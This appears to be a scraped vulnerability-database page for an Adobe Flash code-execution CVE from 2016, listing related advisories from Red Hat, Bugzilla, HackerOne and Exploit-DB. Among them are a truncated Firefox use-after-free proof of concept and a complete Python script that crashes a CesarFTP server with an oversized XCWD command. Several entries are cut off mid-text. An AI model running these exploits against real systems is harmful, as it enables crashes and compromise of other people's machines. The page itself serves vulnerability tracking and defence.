Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1012 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
Red Hat
socat: Hard coded 1024 bit DH p parameter was not prime
vendor_redhat·2016-02-01·CVSS 5.3
CVE-2016-2217 [MEDIUM] CWE-327 socat: Hard coded 1024 bit DH p parameter was not prime
socat: Hard coded 1024 bit DH p parameter was not prime
The OpenSSL address implementation in Socat 1.7.3.0 and 2.0.0-b8 does not use a prime number for the DH, which makes it easier for remote attackers to obtain the shared secret.
Package: socat (Red Hat Enterprise Linux 7) - Not affected
Package: socat (Red Hat OpenShift Enterprise 2) - Not affected
No detection rules found.
Exploit-DB
Mozilla Firefox < 50.1.0 - Use-After-Free
exploitdb·2017-01-13·CVSS 9.8
CVE-2016-9899 [CRITICAL] Mozilla Firefox < 50.1.0 - Use-After-Free
Mozilla Firefox
-->
body{
background-color:lime;
font-color:red;
};
/*
* Mozilla Firefox dd eax
* 0f804c00 4543484f 91919191 91919191 91919191
* 0f804c10 91919191 91919191 91919191 91919191
* 0f804c20 91919191 91919191 91919191 91919191
* 0f804c30 91919191 91919191 91919191 91919191
* 0f804c40 91919191 91919191 91919191 91919191
* 0f804c50 91919191 91919191 91919191 91919191
* 0f804c60 91919191 91919191 91919191 91919191
* 0f804c70 91919191 91919191 91919191 91919191
*
*/
var doc = null;
var cnt = 0;
function m(blocks,size) {
var arr = [];
for(var i=0;i 0) return;
doc.body.appendChild(document.createElement("audio")).remove();
m(1024,1024);
++cnt;
}
function trigger() {
if(cnt > 0) {
var pl = new Array();
doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModifie
Exploit-DB
Apple OS X/iOS Kernel - IOSurface Use-After-Free
exploitdb·2016-10-31
CVE-2016-4625 Apple OS X/iOS Kernel - IOSurface Use-After-Free
Apple OS X/iOS Kernel - IOSurface Use-After-Free
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=831
IOSurfaceRootUserClient stores a task struct pointer (passed in via IOServiceOpen) in the field at +0xf0 without taking a reference.
By killing the corrisponding task we can free this pointer leaving the user client with a dangling pointer. We can get this pointer used
by calling the create_surface_fast_path external method which will try to read and use the memory map off of the free'd task struct.
This bug could be leveraged for kernel memory corruption and is reachable from interesting sandboxes including safari and chrome.
build: clang -o surfaceroot_uaf surfaceroot_uaf.c -framework IOKit
You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actuall
Exploit-DB
CesarFTP 0.99g - XCWD Denial of Service
exploitdb·2016-01-19
CVE-2006-2961 CesarFTP 0.99g - XCWD Denial of Service
CesarFTP 0.99g - XCWD Denial of Service
---
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by : Irving Aguilar
# Email : [email protected]
# Discovery Date : 18.01.2016
# Tested Version : 0.99g
# Vulnerability Type : Denial of Service (DoS)
# Tested on OS : Windows XP Professional SP3 x86 es
import socket
buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send( buffer + '\r\n')
print '[+] Buffer sent'
s.close()
Bugzilla
CVE-2016-1000343 bouncycastle: DSA key pair generator generates a weak private key by default
bugzilla·2018-06-07·CVSS 7.5
CVE-2016-1000343 [HIGH] CVE-2016-1000343 bouncycastle: DSA key pair generator generates a weak private key by default
CVE-2016-1000343 bouncycastle: DSA key pair generator generates a weak private key by default
In the Bouncy Castle JCE Provider version 1.55 and earlier the DSA key pair
generator generates a weak private key if used with default values. If the JCA
key pair generator is not explicitly initialised with DSA parameters, 1.55 and
earlier generates a private value assuming a 1024 bit key size. In earlier
releases this can be dealt with by explicitly passing parameters to the key pair
generator.
Upstream patch:
https://github.com/bcgit/bc-java/commit/50a53068c094d6cff37659da33c9b4505becd389#diff-5578e61500abb2b87b300d3114bdfd7d
Discussion:
Created bouncycastle tracking bugs for this issue:
Affects: epel-all [bug 1588724]
Affects: fedora-all [bug 1588723]
---
(In reply to Pedro Sampaio fr
Bugzilla
CVE-2016-5017 zookeeper: Buffer overflow vulnerability in C cli shell
bugzilla·2016-09-19·CVSS 8.1
CVE-2016-5017 [HIGH] CVE-2016-5017 zookeeper: Buffer overflow vulnerability in C cli shell
CVE-2016-5017 zookeeper: Buffer overflow vulnerability in C cli shell
The ZooKeeper C client shells "cli_st" and "cli_mt" have a buffer overflow vulnerability associated with parsing of the input command when using the "cmd:" batch mode syntax. If the command string exceeds 1024 characters a buffer overflow will occur. There is no known compromise which takes advantage of this vulnerability, and if security is enabled the attacker would be limited by client level security constraints. The C cli shell is intended as a sample/example of how to use the C client interface, not as a production tool - the documentation has also been clarified on this point.
References:
http://seclists.org/bugtraq/2016/Sep/29
Upstream fix:
https://git-wip-us.apache.org/repos/asf?p=zookeeper.git;a=commitdiff;
HackerOne
EBCDIC overread (CVE-2016-2176)
hackerone·2016-05-03·CVSS 8.2
CVE-2016-2176 [HIGH] EBCDIC overread (CVE-2016-2176)
EBCDIC overread (CVE-2016-2176)
https://github.com/openssl/openssl/commit/ea96ad5a206b7b5f25dad230333e8ff032df3219
Severity: Low
ASN1 Strings that are over 1024 bytes can cause an overread in applications using the X509_NAME_oneline() function on EBCDIC systems. This could result in arbitrary stack data being returned in the buffer.
OpenSSL 1.0.2 users should upgrade to 1.0.2h
OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 5th March 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Note
====
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that versio
Bugzilla
CVE-2016-2176 openssl: EBCDIC overread in X509_NAME_oneline()
bugzilla·2016-04-28·CVSS 8.2
CVE-2016-2176 [HIGH] CVE-2016-2176 openssl: EBCDIC overread in X509_NAME_oneline()
CVE-2016-2176 openssl: EBCDIC overread in X509_NAME_oneline()
Quoting form the draft of OpenSSL upstream advisory:
EBCDIC overread (CVE-2016-2176)
Severity: Low
ASN1 Strings that are over 1024 bytes can cause an overread in applications
using the X509_NAME_oneline() function on EBCDIC systems. This could result in
arbitrary stack data being returned in the buffer.
OpenSSL 1.0.2 users should upgrade to 1.0.2h
OpenSSL 1.0.1 users should upgrade to 1.0.1t
This issue was reported to OpenSSL on 5th March 2016 by Guido Vranken. The
fix was developed by Matt Caswell of the OpenSSL development team.
Discussion:
Acknowledgments:
Name: the OpenSSL project
Upstream: Guido Vranken
---
Created attachment 1152051
OpenSSL upstream fix
---
OpenSSL packages distributed by Red Hat do not enable
Bugzilla
flash-plugin: multiple code execution issues fixed in APSB16-10
bugzilla·2016-04-06·CVSS 8.1
CVE-2016-1019 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
A critical vulnerability (CVE-2016-1019) exists in Adobe Flash Player 21.0.0.197 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.
https://helpx.adobe.com/security/products/flash-player/apsa16-01.html
Discussion:
Updates for Adobe Flash Player were released, further details are in the APSB16-10 bulletin.
Adobe Security Bulletin APSB16-10 for Adobe Flash Player describes multiple flaws that can possibly lead to code execution when Flash Player is used to play a specially crafted SWF file.
Quoting from the APSB16-10:
These updates harden a mitigation against JIT spraying attacks that could
Bugzilla
CVE-2016-3189 bzip2: heap use after free in bzip2recover
bugzilla·2016-03-21·CVSS 6.5
CVE-2016-3189 [MEDIUM] CVE-2016-3189 bzip2: heap use after free in bzip2recover
CVE-2016-3189 bzip2: heap use after free in bzip2recover
A heap use after free vulnerability was reported in bzip2recover. A maliciously crafted file could cause the application to crash.
Proposed patch attached.
== ASAN output & backtrace ==
bzip2recover 1.0.6: extracts blocks from damaged .bz2 files.
/opt/bzip-asan/bin/bzip2recover: searching for block boundaries ...
block 1 runs from 176 to 175
block 2 runs from 224 to 871
block 3 runs from 920 to 919
block 4 runs from 968 to 1024 (incomplete)
bzip2recover: splitting into blocks
writing block 2 to `crasherfile1' ...
Program received signal SIGSEGV, Segmentation fault.
==8476== ERROR: AddressSanitizer: heap-use-after-free on address 0x60060000ef8c at pc 0x40277c bp 0x7fff7f1afe90 sp 0x7fff7f1afe80
READ of size 4 at 0x60060000ef8c thre
Bugzilla
CVE-2016-3125 proftpd: usage of 1024 bit DH key even with manual parameters set [fedora-all]
bugzilla·2016-03-14·CVSS 7.5
CVE-2016-3125 [HIGH] CVE-2016-3125 proftpd: usage of 1024 bit DH key even with manual parameters set [fedora-all]
CVE-2016-3125 proftpd: usage of 1024 bit DH key even with manual parameters set [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple support
Bugzilla
CVE-2016-3125 proftpd: usage of 1024 bit DH key even with manual parameters set
bugzilla·2016-03-14·CVSS 7.5
CVE-2016-3125 [HIGH] CVE-2016-3125 proftpd: usage of 1024 bit DH key even with manual parameters set
CVE-2016-3125 proftpd: usage of 1024 bit DH key even with manual parameters set
The ProFTPD daemon supports TLS encrypted connections via the mod_tls module. This module has a configuration option TLSDHParamFile to specify user-defined Diffie Hellman parameters.
A vulnerability was found in ProFTPD before 1.3.5b. The software would ignore the user-defined parameters and use Diffie Hellman key exchanges with 1024 bit
Original report:
http://bugs.proftpd.org/show_bug.cgi?id=4230
External references:
http://proftpd.org/docs/RELEASE_NOTES-1.3.5b
CVE assignment:
http://seclists.org/oss-sec/2016/q1/612
Discussion:
Created proftpd tracking bugs for this issue:
Affects: fedora-all [bug 1317421]
Affects: epel-all [bug 1317422]
---
proftpd-1.3.5b-1.fc22 has been pushed to the Fedora 22
http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00044.htmlhttp://lists.opensuse.org/opensuse-security-announce/2016-05/msg00045.htmlhttp://rhn.redhat.com/errata/RHSA-2016-0610.htmlhttp://www.securityfocus.com/bid/85932http://www.securitytracker.com/id/1035509https://helpx.adobe.com/security/products/flash-player/apsb16-10.htmlhttp://lists.opensuse.org/opensuse-security-announce/2016-05/msg00044.htmlhttp://lists.opensuse.org/opensuse-security-announce/2016-05/msg00045.htmlhttp://rhn.redhat.com/errata/RHSA-2016-0610.htmlhttp://www.securityfocus.com/bid/85932http://www.securitytracker.com/id/1035509https://helpx.adobe.com/security/products/flash-player/apsb16-10.html
2016-04-09
Published